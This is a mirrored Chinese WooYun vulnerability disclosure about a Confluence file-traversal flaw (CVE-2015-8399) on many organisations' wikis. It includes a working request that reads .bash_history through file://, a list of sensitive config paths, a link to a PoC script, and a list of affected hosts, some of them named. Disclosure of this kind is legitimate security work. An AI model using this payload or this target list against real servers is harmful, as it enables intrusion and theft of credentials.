apache/jboss/jetbrains/delphix等多家机构Wiki服务器文件遍历(含PoC)

  • 内容
  • 相关

漏洞详情

披露状态:

 

2016-05-11: 细节已通知厂商并且等待厂商处理中
2016-05-11: 厂商已经确认,细节仅向厂商公开
2016-05-21: 细节向核心白帽子及相关领域专家公开
2016-05-31: 细节向普通白帽子公开
2016-06-10: 细节向实习白帽子公开
2016-06-25: 细节向公众公开

简要描述:

也许我们该拯救一下世界了。仅供娱乐~

详细说明:

感觉这个洞杀伤力还是挺强的,详情在这里

code 区域
http://**.**.**.**/content/27104





CVE描述的是可以读取配置文件

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8399



比如jetbrains的

微信截图_20160507185628_副本.png



这个洞我之前已邮件jetbrans,他们正在修复中



其他敏感目录

code 区域
/WEB-INF/decorators.xml
/WEB-INF/glue-config.xml
/WEB-INF/server-config.wsdd
/WEB-INF/sitemesh.xml
/WEB-INF/urlrewrite.xml
/WEB-INF/web.xml
/databaseSubsystemContext.xml
/securityContext.xml
/services/statusServiceContext.xml
com/atlassian/confluence/security/SpacePermission.hbm.xml
com/atlassian/confluence/user/OSUUser.hbm.xml
com/atlassian/confluence/security/ContentPermissionSet.hbm.xml
com/atlassian/confluence/user/ConfluenceUser.hbm.xml





有权限的话就不只是读个配置文件这么简单了

http://**.**.**.**



读取bash_history

code 区域
https://**.**.**.**//spaces/viewdefaultdecorator.action?decoratorName=file:///home/confluence/.bash_history



微信截图_20160511015808.png





web.xml

微信截图_20160511020424.png





敏感文件.db

微信截图_20160511015122.png





漏洞证明:

**.**.**.**

微信截图_20160511012709.png





**.**.**.**

jboss.png





**.**.**.**

apache.png







还有好多

code 区域
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**:8090
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://cwiki.**.**.**.**
http://**.**.**.**
http://www.beecom.ch
http://confluence.slac.**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://wiki.auckland.ac.nz
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://cwiki.**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://docs.**.**.**.**
http://doc.ez.no
http://www.meta-inf.hu
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://www.**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://confluence.ryerson.ca
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://**.**.**.**
https://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**
https://**.**.**.**.au
http://**.**.**.**.au
http://**.**.**.**
https://wiki.nci.nih.gov
https://**.**.**.**
http://**.**.**.**
https://**.**.**.**
http://**.**.**.**





脚本:

code 区域
https://**.**.**.**/Xyntax/POC-T/blob/master/module/confluence-file-read.py

 

修复方案:

jetbrains还在思考:

微信截图_20160511022219.png





版权声明:转载请注明来源 xyntax@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-05-11 15:01

厂商回复:

CNVD确认所述漏洞情况,暂未建立与上述网站管理单位的直接处置渠道,待认领。

最新状态:

暂无


本文标签:

版权声明:若无特殊注明,本文皆为《安三》原创,转载请保留文章出处。『鹦鹉搜索』

百度收录:百度未收录『点击提交』

本文链接:apache/jboss/jetbrains/delphix等多家机构Wiki服务器文件遍历(含PoC) - https://www.15qq.cn/wooyun/423.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

允许邮件通知